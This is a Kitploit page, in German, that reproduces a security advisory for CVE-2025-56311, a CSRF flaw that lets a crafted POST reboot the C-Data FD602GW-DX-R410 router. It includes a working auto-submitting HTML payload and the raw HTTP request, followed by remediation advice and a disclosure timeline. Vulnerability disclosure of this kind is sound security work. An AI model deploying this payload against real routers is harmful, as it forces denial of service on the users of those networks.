Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-56311 — Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 ermöglicht es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist. | Kitploit
Tools/GitHubGitHub/wrathfuldiety/cve-2025-56311
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 ermöglicht es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.

Repository anzeigen
6vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-56311: Sicherheitshinweis – CSRF-Schwachstelle in der Neustartfunktion des Routers FD602GW-DX-R410

Proof of Concept und Sicherheitshinweis für eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) in der Admin-Oberfläche des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14). Der Hinweis beschreibt die Auswirkungen, den Angriffsvektor und Empfehlungen zur Behebung.

fd602gw-dx-r410-csrf-advisory

Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 erlaubt es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.


Überblick

In der webbasierten Admin-Konsole des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14) wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt. Der Endpunkt /boaform/admin/formReboot erlaubt es, per POST-Anfrage einen vollständigen Neustart des Geräts auszulösen, ohne dass CSRF-Tokens oder eine Origin-Validierung erforderlich sind. Wenn ein authentifizierter Administrator eine schädliche Seite besucht, kann der Router ohne Zustimmung remote neu gestartet werden.

  • CVE-ID: CVE-2025-56311
  • Veröffentlichungsdatum des Advisories: Juli 2025
  • Entdeckt von: Hasanka Amarasinghe (Unabhängiger Sicherheitsforscher)
  • Anbieter: Shenzhen C-Data Technology Co., Ltd.
  • Betroffenes Produkt: Glasfaser-Router FD602GW-DX-R410
  • Firmware-Version: V2.2.14 (Build.1918.241111)
  • Hardware-Version: R410.1B
  • Bootloader-Version: V3.7-2312181457
  • Webserver: Boa/0.93.15
  • Zugriffsvektor: Remote (Der authentifizierte Administrator muss angemeldet sein)
  • Schweregrad: Mittel
  • CVSS v3.1 Basisscore: 5.4 (Mittel)

Betroffenes Produkt

  • Gerät: Glasfaser-Router FD602GW-DX-R410
  • Firmware: V2.2.14 (Build.1918.241111)
  • Komponente: Neustart-Handler - /boaform/admin/formReboot
  • Webserver: Boa/0.93.15

Details zur Schwachstelle

  • Typ: Cross-Site Request Forgery (CSRF)
  • Angriffsvektor: Remote (Der Administrator muss in seiner Sitzung angemeldet sein)
  • Authentifizierung: Für den Angreifer nicht erforderlich (Administratorsitzung im Browser des Opfers erforderlich)
  • Auswirkung: Unautorisierter Neustart des Geräts
  • Zustandspersistenz: Zustandslose Sitzung, wahrscheinlich über IP oder interne Sitzungs-Tokens verfolgt

Proof of Concept (PoC)

CSRF-Payload (HTML)

<html>
  <!-- CSRF PoC - generated by Burp Suite Pro -->
  <body>
    <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
      <input type="hidden" name="postSecurityFlag" value="+65535" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

HTTP-Anfrage

POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

postSecurityFlag=+65535

Antwort

HTTP 200 OK; Der Router startet sofort neu.


Empfehlungen

  • Implementieren Sie CSRF-Tokens und eine strikte Origin-/Referer-Validierung auf allen Admin-Endpunkten.
  • Machen Sie veraltete oder verwaiste Sitzungen ungültig und binden Sie Sitzungen an sichere Cookies.
  • Erwägen Sie CAPTCHA- oder Bestätigungsabfragen, bevor destruktive Aktionen wie ein Neustart ausgeführt werden.
  • Beschränken Sie den Zugriff auf die Admin-Oberfläche ausschließlich auf vertrauenswürdige IPs oder interne Netzwerke.

Angriffsvektor

  • Erfordert, dass der Router-Administrator authentifiziert (angemeldet) ist.
  • Ein Angreifer lockt das Opfer auf eine schädliche Webseite, die unbemerkt eine POST-Anfrage an den Neustart-Endpunkt auslöst.
  • Der Router akzeptiert die gefälschte Anfrage und startet sofort neu, was einen Denial of Service verursacht.

Auswirkungen

  • Denial of Service durch erzwungenen Neustart.
  • Verlust der Netzwerkverfügbarkeit für alle verbundenen Benutzer.
  • Möglichkeit, dies mit anderen Problemen zu kombinieren (z. B. Session-Hijacking oder XSS), um die Auswirkungen zu verstärken.

Offenlegungszeitplan

DatumAktion
Jun 2025Schwachstelle entdeckt
Jun 2025Verantwortungsvolle Offenlegung versucht (keine Antwort)
Jul 2025CVE-ID bei MITRE angefordert
Jul 2025Advisory vorbereitet und Veröffentlichung ausstehend
Sep 2025CVE zugewiesen, Advisory veröffentlicht

Referenzen

  • Anbieter: Shenzhen C-Data Technology Co., Ltd.
  • Gerät: FD602GW-DX-R410
  • Firmware: V2.2.14
  • GitHub Advisory: https://github.com/wrathfulDiety/CVE-2025-56311

Haftungsausschluss

Dieses Advisory dient Bildungs- und Sicherheitsbewusstseinszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch. Sämtliche Tests wurden in einer kontrollierten Umgebung durchgeführt.

Tool herunterladen